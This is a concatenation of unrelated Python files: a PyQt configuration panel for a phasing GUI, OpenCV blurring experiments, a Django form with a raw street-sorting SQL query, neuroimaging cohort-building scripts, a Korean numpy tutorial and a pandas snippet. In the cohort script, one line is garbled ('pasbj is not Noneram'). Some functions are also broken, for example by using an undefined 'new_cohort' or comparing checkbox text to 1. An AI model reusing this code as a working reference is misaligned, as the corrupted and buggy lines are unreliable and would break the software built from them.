index = rule.indexIn(text, 0)
while index >= 0:
length = len(rule.cap(0))
self.setFormat(index, length, cf)
index = rule.indexIn(text, index+length)
self.setCurrentBlockState(0)
class ConfigPanel(QtWidgets.QWidget):
def __init__(self, parent, **kwargs):
super(ConfigPanel, self).__init__(parent, **kwargs)
self.parent = parent
self.canvas_panel = parent.canvas_panel
self.input_merge_fname = parent.input_merge_fname
self.input_map_fname = parent.input_map_fname
self.setObjectName('config')
self.setAttribute(QtCore.Qt.WA_StyledBackground)
self.processed_map = False
self.checker = QtCore.QTimer(self)
self.checker.timeout.connect(self.keep_checking)
self.launcher = worker.Launcher(self, self.parent.launch_cmd)
self.init_UI()
def init_UI(self):
self.setMinimumWidth(300)
#self.setMinimumWidth(80)
vbox = QtWidgets.QVBoxLayout()
self.setLayout(vbox)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
self.title_label = QtWidgets.QLabel('ResEx Phasing GUI', self)
self.title_label.setObjectName('heading')
hbox.addWidget(self.title_label)
hbox.addStretch(1)
'''
self.collapse_button = QtWidgets.QPushButton('<', self)
self.collapse_button.clicked.connect(self.toggle_config)
hbox.addWidget(self.collapse_button)
'''
# Tabs
self.notebook = QtWidgets.QTabWidget()
vbox.addWidget(self.notebook, stretch=2)
# Bottom panel
self.plot_controls = self.canvas_panel.init_plot_controls(self.input_merge_fname)
vbox.addWidget(self.plot_controls)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
'''
button = QtWidgets.QPushButton("Preprocess", self)
button.clicked.connect(self.preprocess)
hbox.addWidget(button)
'''
button = QtWidgets.QPushButton("Quit", self)
button.clicked.connect(self.parent.close)
hbox.addWidget(button)
self.gen_merge_tab()
self.gen_map_tab()
self.gen_recon_tab()
self.show()
self.plot_vol(fname=self.input_merge_fname)
def gen_merge_tab(self, add=True):
self.merge_tab = QtWidgets.QWidget()
if add:
self.notebook.addTab(self.merge_tab, 'Merge')
vbox = QtWidgets.QVBoxLayout(self.merge_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Merge File', self)
hbox.addWidget(label)
self.merge_fname = QtWidgets.QLineEdit(self.input_merge_fname, self)
hbox.addWidget(self.merge_fname, stretch=1)
button = QtWidgets.QPushButton('Plot Merge', self)
button.clicked.connect(lambda :self.plot_vol(fname=self.merge_fname.text(), zoom=False))
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Cutoff radii:', self)
hbox.addWidget(label)
self.radiusmin = QtWidgets.QLineEdit('0', self)
self.radiusmin.setFixedWidth(80)
hbox.addWidget(self.radiusmin)
self.radiusmax = QtWidgets.QLineEdit('200', self)
self.radiusmax.setFixedWidth(80)
hbox.addWidget(self.radiusmax)
self.circleflag = QtWidgets.QCheckBox('Show', self)
#self.circleflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom=False))
self.circleflag.stateChanged.connect(self.update_rings)
hbox.addWidget(self.circleflag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Scale radii:', self)
hbox.addWidget(label)
self.scaleradmin = QtWidgets.QLineEdit('60', self)
self.scaleradmin.setFixedWidth(80)
hbox.addWidget(self.scaleradmin)
self.scaleradmax = QtWidgets.QLineEdit('80', self)
self.scaleradmax.setFixedWidth(80)
hbox.addWidget(self.scaleradmax)
self.scaleradflag = QtWidgets.QCheckBox('Show', self)
#self.scaleradflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom=False))
self.scaleradflag.stateChanged.connect(self.update_rings)
hbox.addWidget(self.scaleradflag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Zero Outer', self)
button.clicked.connect(self.launcher.zero_outer)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Calc. Scale', self)
button.clicked.connect(self.launcher.calc_scale)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Reset', self)
button.clicked.connect(self.reset_merge_tab)
hbox.addWidget(button)
self.zero_outer_line = QtWidgets.QFrame()
vbox.addWidget(self.zero_outer_line)
hbox = QtWidgets.QHBoxLayout()
self.zero_outer_line.setLayout(hbox)
hbox.setContentsMargins(0, 0, 0, 0)
zero_fname = os.path.splitext(self.merge_fname.text())[0] + '-zero.raw'
label = QtWidgets.QLabel('Zero-ed volume:', self)
hbox.addWidget(label)
button = QtWidgets.QPushButton(zero_fname, self)
button.clicked.connect(lambda: self.plot_vol(fname=zero_fname))
hbox.addWidget(button)
hbox.addStretch(1)
self.zero_outer_line.hide()
self.calc_scale_line = QtWidgets.QFrame()
vbox.addWidget(self.calc_scale_line)
hbox = QtWidgets.QHBoxLayout()
self.calc_scale_line.setLayout(hbox)
hbox.setContentsMargins(0, 0, 0, 0)
self.scale_label = QtWidgets.QLabel('Scale factor = %.6e'%0.0, self)
hbox.addWidget(self.scale_label)
hbox.addStretch(1)
self.calc_scale_line.hide()
vbox.addStretch(1)
def gen_map_tab(self, add=True):
self.map_tab = QtWidgets.QWidget()
if add:
self.notebook.addTab(self.map_tab, 'Map')
vbox = QtWidgets.QVBoxLayout(self.map_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Map File', self)
hbox.addWidget(label)
self.map_fname = QtWidgets.QLineEdit(self.input_map_fname, self)
hbox.addWidget(self.map_fname, stretch=1)
button = QtWidgets.QPushButton('Plot Map', self)
button.clicked.connect(lambda: self.canvas_panel.plot_map(self.map_fname.text()))
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Res. at edge (A):', self)
hbox.addWidget(label)
self.resedge = QtWidgets.QLineEdit('2.0', self)
#self.resedge.setFixedWidth(60)
hbox.addWidget(self.resedge)
label = QtWidgets.QLabel('Point group:', self)
hbox.addWidget(label)
self.point_group = QtWidgets.QLineEdit('222', self)
#self.point_group.setFixedWidth(60)
hbox.addWidget(self.point_group)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Process Map', self)
button.clicked.connect(self.process_map)
hbox.addWidget(button)
self.reset_button = QtWidgets.QPushButton('Reset', self)
self.reset_button.clicked.connect(self.reset_map_tab)
self.reset_button.setEnabled(False)
hbox.addWidget(self.reset_button)
hbox.addStretch(1)
vbox.addStretch(1)
def gen_recon_tab(self):
self.recon_tab = QtWidgets.QWidget()
self.notebook.addTab(self.recon_tab, 'Recon')
vbox = QtWidgets.QVBoxLayout(self.recon_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Output Prefix:', self)
hbox.addWidget(label)
self.output_prefix = QtWidgets.QLineEdit('data/recon/output', self)
hbox.addWidget(self.output_prefix, stretch=1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Config file name:', self)
hbox.addWidget(label)
self.config_fname = QtWidgets.QLineEdit('config.ini', self)
hbox.addWidget(self.config_fname, stretch=1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
self.bgfitting_flag = QtWidgets.QCheckBox('BG Fitting', self)
hbox.addWidget(self.bgfitting_flag)
self.variation_flag = QtWidgets.QCheckBox('Variation support', self)
hbox.addWidget(self.variation_flag)
self.positivity_flag = QtWidgets.QCheckBox('Positivity', self)
hbox.addWidget(self.positivity_flag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Generate', self)
button.clicked.connect(self.gen_config)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Show', self)
button.clicked.connect(self.show_config)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Save', self)
button.clicked.connect(self.save_config)
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Launch Recon', self)
button.clicked.connect(self.launch_recon)
hbox.addWidget(button, stretch=1)
self.checkflag = QtWidgets.QCheckBox('Keep Checking', self)
self.checkflag.stateChanged.connect(self.keep_checking)
hbox.addWidget(self.checkflag)
self.fslices = QtWidgets.QCheckBox('Fourier', self)
hbox.addWidget(self.fslices)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox, stretch=1)
self.config_area = QtWidgets.QPlainTextEdit(self)
self.highlighter = IniHighlighter(self.config_area.document())
self.config_area.setPlainText('')
hbox.addWidget(self.config_area)
def reset_merge_tab(self, event=None):
self.notebook.removeTab(0)
#self.merge_tab.delete()
self.gen_merge_tab(add=False)
self.notebook.insertTab(0, self.merge_tab, 'Merge')
self.notebook.setCurrentIndex(0)
self.parse_vol(reset=True)
def reset_map_tab(self, event=None):
self.processed_map = True
self.notebook.removeTab(1)
#self.map_tab.delete()
self.map_tab = None
self.gen_map_tab(add=False)
self.notebook.insertTab(1, self.map_tab, 'Map')
self.notebook.setCurrentIndex(1)
self.processed_map = False
self.reset_map.setEnabled(False)
def add_to_map_tab(self, mapnoext):
if self.processed_map:
return
prefix = 'data/convert/'+mapnoext
vbox = self.map_tab.layout()
vbox.removeItem(vbox.takeAt(vbox.count()-1))
hbox = vbox.takeAt(vbox.count()-1).layout()
hbox.removeItem(hbox.takeAt(hbox.count()-1))
self.suppressflag = QtWidgets.QCheckBox('Suppress low-q', self)
self.suppressflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom='current', sigma=self.suppressflag.isChecked()))
hbox.addWidget(self.suppressflag)
hbox.addStretch(1)
vbox.addLayout(hbox)
grid = QtWidgets.QGridLayout()
vbox.addLayout(grid)
label = QtWidgets.QLabel('Complex:', self)
grid.addWidget(label, 0, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '.cpx'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '.cpx', sigma=self.suppressflag.isChecked()))
grid.addWidget(button, 0, 1)
label = QtWidgets.QLabel('Symmetrized:', self)
grid.addWidget(label, 1, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '-sym.raw'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '-sym.raw', sigma=self.suppressflag.isChecked()))
grid.addWidget(button, 1, 1)
label = QtWidgets.QLabel('Density:', self)
grid.addWidget(label, 2, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '-srecon.raw'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '-srecon.raw', zoom=True))
grid.addWidget(button, 2, 1)
label = QtWidgets.QLabel('Support:', self)
grid.addWidget(label, 3, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '.supp'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '.supp', zoom=True, interpolation=None))
grid.addWidget(button, 3, 1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Support: Conv. radius = ', self)
hbox.addWidget(label)
self.suppradstr = QtWidgets.QLineEdit('3', self)
self.suppradstr.setFixedWidth(40)
hbox.addWidget(self.suppradstr)
label = QtWidgets.QLabel('vox. Threshold = ', self)
hbox.addWidget(label)
self.suppthreshstr = QtWidgets.QLineEdit('1', self)
self.suppthreshstr.setFixedWidth(40)
hbox.addWidget(self.suppthreshstr)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Update support', self)
button.clicked.connect(lambda: self.process_map(skip=True))
hbox.addWidget(button)
hbox.addStretch(1)
vbox.addStretch(1)
self.reset_button.setEnabled(True)
self.processed_map = True
def gen_config(self, event=None):
if self.calc_scale_line.isHidden() or self.zero_outer_line.isHidden():
print('Need to zero_outer and calc_scale first')
return
with open(self.config_fname.text(), 'w') as f:
f.write('[parameters]\n')
f.write('size = %d\n' % self.canvas_panel.vol_size)
f.write('bragg_qmax = %f\n' % (float(self.radiusmin.text())/(self.canvas_panel.vol_size//2)))
f.write('scale_factor = %f\n' % float(self.scale_label.text().split()[-1]))
f.write('num_threads = %d\n' % multiprocessing.cpu_count())
f.write('point_group = %s\n' % self.point_group.text())
mapnoext = os.path.splitext(os.path.basename(self.map_fname.text()))[0]
f.write('\n[files]\n')
f.write('intens_fname = %s\n' % (os.path.splitext(self.merge_fname.text())[0].rstrip()+'-zero.raw'))
f.write('bragg_fname = %s\n' % ('data/convert/'+mapnoext+'.cpx'))
f.write('support_fname = %s\n' % ('data/convert/'+mapnoext+'.supp'))
#f.write('input_fname = %s\n')
f.write('output_prefix = %s\n' % self.output_prefix.text())
f.write('\n[algorithm]\n')
#f.write('# Algorithm choices: DM, HIO, RAAR, mod-DM, ER\n')
#f.write('# With beta = 1, all algorithms except ER are equivalent\n')
#f.write('# algorithm and avg_algorithm are space separated with alternating numbers and names\n')
f.write('algorithm = 200 DM\n')
f.write('avg_algorithm = 100 DM\n')
f.write('beta = 1.\n')
if self.positivity_flag.text() == 1:
f.write('positivity = 1\n')
if self.bgfitting_flag.text() == 1:
f.write('bg_fitting = 1\n')
if self.variation_flag.text() == 1:
f.write('local_variation = 1\n')
'''
if self.histogram_flag.text() == 1:
f.write('histogram = 1\n')
f.write('hist_fname = data/3wu2_hist.dat\n')
'''
print('Generated %s' % self.config_fname.text())
self.show_config()
def show_config(self):
with open(self.config_fname.text(), 'r') as f:
config_text = f.read()
self.config_area.setPlainText(config_text)
self.config_area.show()
self.highlighter.rehighlight()
def save_config(self):
with open(self.config_fname.text(), 'w') as f:
f.write(self.config_area.toPlainText())
def plot_vol(self, **kwargs):
'''Wrapper around canvas_panel.plot_vol'''
parsed = self.canvas_panel.plot_vol(**kwargs)
if parsed:
size = self.canvas_panel.vol_size
self.radiusmin.setText('%d' % (size//2//2))
self.radiusmax.setText('%d' % (size))
self.scaleradmin.setText('%d' % (size//2//2*0.9))
self.scaleradmax.setText('%d' % (size//2//2*1.1))
def process_map(self, event=None, skip=False):
'''Wrapper around launcher.process_map'''
mapnoext = os.path.splitext(os.path.basename(self.map_fname.text()))[0]
if skip or (not os.path.isfile('data/convert/'+mapnoext+'.cpx')) or QtWidgets.QMessageBox.question(self, 'Process Map', 'Found processed map output. Overwrite?', QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No) == QtWidgets.QMessageBox.Yes:
if self.resedge.text() is '':
print('Need resolution at edge of volume')
return
self.launcher.process_map(skip=skip)
else:
self.add_to_map_tab(mapnoext)
with open('results/'+mapnoext+'.log', 'r') as f:
words = f.read().split()
warray = np.array(words)
self.resedge.setText(str(float(words[words.index('./utils/read_map')+2])/(self.canvas_panel.vol_size//2)))
self.point_group.setText(words[np.where(warray=='data/convert/'+mapnoext+'-srecon.raw')[0][0]+2])
self.suppradstr.setText('%.1f'%float(words[np.where(warray=='./utils/create_support')[0][-1]+2]))
self.suppthreshstr.setText('%.1f'%float(words[np.where(warray=='./utils/create_support')[0][-1]+3]))
def launch_recon(self, event=None):
'''Wrapper around launcher.launch_recon'''
if (not os.path.isfile(self.output_prefix.text()+'-log.dat')) or QtWidgets.QMessageBox.question(self, 'Overwrite Output?', 'Found output with same prefix: %s\nOverwrite?'%self.output_prefix.text(), QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No) == QtWidgets.QMessageBox.Yes:
self.launcher.launch_recon()
def keep_checking(self, event=None):
if self.checkflag.isChecked():
self.canvas_panel.update_slices(self.output_prefix.text(), fslices=self.fslices.isChecked())
self.checker.start(1000)
else:
self.checker.stop()
def update_rings(self, event=None):
s = self.canvas_panel.figure.axes[0]
size = self.canvas_panel.vol_size
[a.remove() for a in list(set(s.findobj(patches.Circle)))]
if self.circleflag.isChecked():
rmin = float(self.radiusmin.text())
rmax = float(self.radiusmax.text())
s.add_artist(patches.Circle((size//2,size//2), rmin, ec='white', fc='none'))
s.add_artist(patches.Circle((size//2,size//2), rmax, ec='white', fc='none'))
if self.scaleradflag.isChecked():
rmin = float(self.scaleradmin.text())
rmax = float(self.scaleradmax.text())
s.add_artist(patches.Circle((size//2,size//2), rmin, ec='white', fc='none', ls='dashed'))
s.add_artist(patches.Circle((size//2,size//2), rmax, ec='white', fc='none', ls='dashed'))
self.canvas_panel.canvas.draw()
|
# coding: utf-8
# In[7]:
import cv2
import numpy as np
import imutils
import matplotlib.pyplot as plt
# In[8]:
img = cv2.imread('/home/padmach/data/pyimagesearch/flower1.jpg')
cv2.imshow('',img)
cv2.waitKey(0)
# In[15]:
kernelSizes =[(3,3),(3,5),(9,9), (15, 15), (5, 3), (9,19), (19,19)]
#Applying average blurring
for (kx, ky) in kernelSizes:
blurred = cv2.blur(img, (kx,ky))
cv2.imshow('Average ({}, {})'.format(kx, ky), blurred)
cv2.waitKey(0)
# In[14]:
#Applying Gaussian blurring
for (kx, ky) in kernelSizes:
blurred = cv2.GaussianBlur(img, (kx,ky),0) #0 indicates that standard deviation is computed based on kernel size
cv2.imshow('Gaussian ({},{})'.format(kx,ky), blurred)
cv2.waitKey(0)
# In[18]:
#Applying Median filtering
for k in (3, 9, 15, 19, 21, 23, 25, 27, 29):
blurred = cv2.medianBlur(img, k)
cv2.imshow('Median {}'.format(k), blurred)
cv2.waitKey(0)
# In[21]:
#Applying Bilateral filtering
params =[(11, 21, 7), (11, 41, 21),(11, 61, 39)]
for (diameter, sigmaColor, sigmaSpace) in params:
blurred = cv2.bilateralFilter(img, diameter, sigmaColor, sigmaSpace)
cv2.imshow('Blurred d ={}, sc = {}, ss = {}'.format(diameter, sigmaColor, sigmaSpace), blurred)
cv2.waitKey(0)
# In[ ]:
|
# coding=utf-8
from django.forms import ModelForm, CharField, HiddenInput, ModelChoiceField
from models import Order, Street
def qqq ( **x):
return Street.objects.get (pk = x['pk'])
def my_special_sql_for_vasilyevsky_island_streets ():
return u"""
(SELECT * FROM mulan_street WHERE (name<'линия' AND (type!='линия' OR (type='линия' AND (LENGTH(name)>4)))) ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE type='линия' AND LENGTH(name)=3 ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE type='линия' AND LENGTH(name)=4 ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE (name>'линия' AND (type!='линия' OR (type='линия' AND (LENGTH(name)>4)))) ORDER BY name)
"""
class OrderForm(ModelForm):
order_contents = CharField(label="", widget=HiddenInput(), required=False)
q0 = (Street.objects.raw(my_special_sql_for_vasilyevsky_island_streets()))
q0.all = q0.__iter__
q0.get = lambda **x: qqq( **x)
street = ModelChoiceField (queryset = q0, label="Улица")
class Meta:
model = Order
exclude = ('processed',)
|
# -*- coding: utf-8 -*-
import os
import os.path as op
import json
import random
# ----------------------------------------------------------------------- #
# Functions to create cohorts with some subjects which have not all files
# ----------------------------------------------------------------------- #
def select_subjects(env_file, name_cohort, save):
""" Create the exclusion list of a cohort, regardless if the subject have the good files or not
"""
dico = {}
dico['exclusion_list'] = []
dico['inclusion_list'] = []
sbj = 0
with open(env_file, 'r') as f:
param = json.load(f)
db_dir = param["cohorts"][name_cohort]['path']
acquisition = param["cohorts"][name_cohort]['acquisition']
center = param["cohorts"][name_cohort]['centers']
analysis = param["cohorts"][name_cohort]['analysis']
graph_v = param["cohorts"][name_cohort]['graph_v']
ngraph_v = param["cohorts"][name_cohort]['ngraph_v']
session = param["cohorts"][name_cohort]['session']
path = os.path.join(db_dir, center)
print('Subjets excluded: ')
for s in os.listdir(path):
if s[-4:] != "minf" and s[-4:] != "html":
sbj += 1
hemi = 'L'
# T1
if not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii"))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz"))):
dico['exclusion_list'].append(s)
print(s, ': No T1')
# Roots
elif not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation',
hemi + 'roots_' + s + '.nii'))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation',
hemi + 'roots_' + s + '.nii.gz'))):
dico['exclusion_list'].append(s)
print(s, ': No roots')
# Skeleton
elif not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii'))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz'))):
dico['exclusion_list'].append(s)
print(s, ': No skeleton')
# Graph
elif not op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')):
dico['exclusion_list'].append(s)
print(s, ': No graph')
# Not cut graph
elif not op.exists(
op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')):
if ngraph_v != -1:
dico['exclusion_list'].append(s)
print('No not cut graph')
else:
dico['inclusion_list'].append(s)
print('Nombre total de sujets: ', sbj)
print('Nombre de sujets exclus: ', len(dico['exclusion_list']))
print('Nombre de sujets inclus:', len(dico['inclusion_list']))
if save:
with open(env_file, 'r') as f:
env = json.load(f)
env["cohorts"][name_cohort]["exclusion"] = dico['exclusion_list']
with open(env_file, 'w') as f:
json.dump(env, f)
print('Saved in ', env_file)
def change_path_cohort(cohort_file, new_path, start, end, path_to_save, save):
""" Modify the path of attributes of all subjects in the cohort
"""
with open(cohort_file, 'r') as f:
cohort = json.load(f)
for sbj in cohort['subjects']:
sbj['t1'] = sbj['t1'][:start] + new_path + sbj['t1'][end:]
sbj['roots'] = sbj['roots'][:start] + new_path + sbj['roots'][end:]
sbj['skeleton'] = sbj['skeleton'][:start] + new_path + sbj['skeleton'][end:]
sbj['graph'] = sbj['graph'][:start] + new_path + sbj['graph'][end:]
if sbj['notcut_graph'] != -1:
sbj['notcut_graph'] = sbj['notcut_graph'][:start] + new_path + sbj['notcut_graph'][end:]
print(cohort['subjects'][0]['t1'])
print(cohort['subjects'][0]['roots'])
print(cohort['subjects'][0]['skeleton'])
print(cohort['subjects'][0]['graph'])
print(cohort['subjects'][0]['notcut_graph'])
if save:
with open(path_to_save, 'w') as f:
json.dump(cohort, f)
print('cohort save')
def create_short_cohort(path_to_cohort, n_sbj, order, save, new_name=None):
""" Create cohort with n_sbj subjects from a full cohort
"""
with open(path_to_cohort, 'r') as f:
cohort = json.load(f)
if order:
cohort['subjects'] = cohort['subjects'][:n_sbj]
else:
cohort['subjects'] = random.sample(cohort['subjects'], k=n_sbj)
if new_name is None:
new_cohort['name'] = cohort['name'][:-7] + '_short' + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + '_short' + path_to_cohort[-12:]
else:
new_cohort['name'] = cohort['name'][:-7] + new_name + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + new_name + path_to_cohort[-12:]
if save:
with open(new_path, 'w') as f:
json.dump(new_cohort, f)
print('cohort saved:', new_path)
return new_cohort
def select_subjects_from_cohort(path_to_cohort, sbj, save, new_name=None):
""" Create cohort with subjects in sbj from the cohort
"""
with open(path_to_cohort, 'r') as f:
cohort = json.load(f)
new_cohort = cohort.copy()
new_cohort['subjects'] = []
for s in cohort['subjects']:
if s['name'] in sbj:
new_cohort['subjects'].append(s)
else:
print(s['name'])
if new_name is None:
new_cohort['name'] = cohort['name'][:-7] + '_short' + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + '_short' + path_to_cohort[-12:]
else:
new_cohort['name'] = cohort['name'][:-7] + new_name + cohort['name'][-7:]
new_path = path_to_cohort[:-12] + new_name + path_to_cohort[-12:]
if save:
with open(new_path, 'w') as f:
json.dump(new_cohort, f)
print('cohort saved:', new_path)
return new_cohort
def create_cohort(env_file, name_cohort):
""" Create cohort called named_cohort from env_file, do not take in account subjects without the good files
"""
with open(env_file, 'r') as f:
param = json.load(f)
db_dir = param["cohorts"][name_cohort]['path']
acquisition = param["cohorts"][name_cohort]['acquisition']
center = param["cohorts"][name_cohort]['centers']
analysis = param["cohorts"][name_cohort]['analysis']
graph_v = pasbj is not Noneram["cohorts"][name_cohort]['graph_v']
ngraph_v = param["cohorts"][name_cohort]['ngraph_v']
session = param["cohorts"][name_cohort]['session']
working_path = param["working_path"]
path = os.path.join(db_dir, center)
for hemi in ['L', 'R']:
cohort = {'name': name_cohort+'_hemi-'+hemi, 'subjects': []}
for s in os.listdir(path):
if s[-4:] != "minf" and s[-4:] != "html":
to_add = True
name = s
# T1
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii")):
t1 = op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii")
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz")):
t1 = op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz")
else:
to_add = False
print(name, 'No T1')
# Roots
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii')):
roots = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii')
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii.gz')):
roots = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'roots_' + s + '.nii.gz')
else:
to_add = False
print(name, 'No roots')
# Skeleton
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii')):
skeleton = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii')
elif op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz')):
skeleton = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz')
else:
to_add = False
print(name, 'No skeleton')
# Graph
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')):
graph = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')
else:
to_add = False
print(name, 'No graph')
# Not cut graph
if op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')):
notcut_graph = op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')
else:
if ngraph_v != -1:
to_add = False
print(name, 'No not cut graph')
else:
notcut_graph = None
if to_add:
dico_sbj = {'name': name,
't1': t1,
'roots': roots,
'skeleton': skeleton,
'graph': graph,
'notcut_graph': notcut_graph}
cohort['subjects'].append(dico_sbj)
print('subject', name, 'added')
print('Cohort: ', name_cohort)
print('Hemi: ', hemi)
print('Number of subject: ', len(cohort['subjects']), '\n')
with open(op.join(working_path, 'cohorts', 'cohort-'+name_cohort+'_hemi-'+hemi+'.json'), 'w') as f:
json.dump(cohort, f)
print('File saved :' + 'cohort-'+name_cohort+'_hemi-'+hemi+'.json\n')
def create_composed_cohort(env_file, name_cohort):
""" Create cohort called named cohort from different cohorts, sum up in the env_file
"""
with open(env_file, 'r') as f:
param = json.load(f)
working_path = param["working_path"]
for hemi in ['L', 'R']:
cohort = {'name': name_cohort + '_hemi-' + hemi, 'subjects': []}
for n, v in param["composed_cohorts"][name_cohort]["cohort"].items():
with open(op.join(working_path, 'cohorts', 'cohort-'+n+'_hemi-'+hemi+'.json'), 'r') as f:
c = json.load(f)
subjects = c['subjects']
if 'indexes' in v.keys():
for i in v['indexes']:
cohort['subjects'].append(subjects[i])
else:
cohort['subjects'] += subjects
print('\nCohort: ', name_cohort)
print('Hemi: ', hemi)
print('Number of subject: ', len(cohort['subjects']))
with open(op.join(working_path, 'cohorts', 'cohort-' + name_cohort + '_hemi-' + hemi + '.json'), 'w') as f:
json.dump(cohort, f)
print('File saved : ', op.join(working_path, 'cohorts', 'cohort-' + name_cohort + '_hemi-' + hemi + '.json'))
|
import numpy as np
# CRUD ( 추가 수정 삭제 검색 정렬 )
data = np.array([1, 2, 3, 4, 5, 6])
print(data)
# 추가
data = np.append(data, [7, 8])
print(data)
# 중간추가
data = np.insert(data, 1, [9, 10])
print(data)
# 수정
data[0] = 100
print(data)
# Slicing 수정
data[1:3] = (22, 33)
print(data)
data[3:5] = data[5:6]
print(data)
index = data > 4
data[index] = data[index] + 2
# 삭제
data = np.delete(data, 1)
print(data)
# 범위를 지정하여 삭제시 np.s_를 사용하여 삭제가능
# Index Slicing 으로 [2:]를 줄경우 에러발생
data = np.delete(data, np.s_[2:])
# data = np.delete(data, slice(2, len(data)))
print(data)
# 검색
data1 = np.array([10, 20, 30, 40, 50])
search_result_index = np.where(data1 >= 40)
print(search_result_index)
print(data1[search_result_index])
# 30보다 작은 수를 삭제하시오
data1 = np.array([10, 20, 30, 40, 50])
search_result_index = np.where(data1 < 30)
data1 = np.delete(data1, search_result_index)
print(data1)
# 정렬
# 오름차순
data2 = np.array([10, 200, 30, 40, 50])
print(np.sort(data2))
# 내림차순
data2 = np.sort(data2)
print(data2[-1::-1])
print(np.sort(data2)[-1::-1])
# 증감이 마이너스 값이면 시작 인덱스가 -1
print(np.sort(data2)[::-1])
# 정렬시 인덱스 추출
# np.argsort 후에는 정렬 전 인덱스값이 정렬 후 어떻게 변경되는지 추출
data2 = np.array([10, 200, 30, 40, 50])
# 결과값 : [ 0 2 3 4 1 ]
print(np.argsort(data2))
|
import pandas as pd
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
df_all_states=pd.read_csv('E:\csvdhf5xlsxurlallfiles/2008_all_states.csv')
print(df_all_states.columns)
